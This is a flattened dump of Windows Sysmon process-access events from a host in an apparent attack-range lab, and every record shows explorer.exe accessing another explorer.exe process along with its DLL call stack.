16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 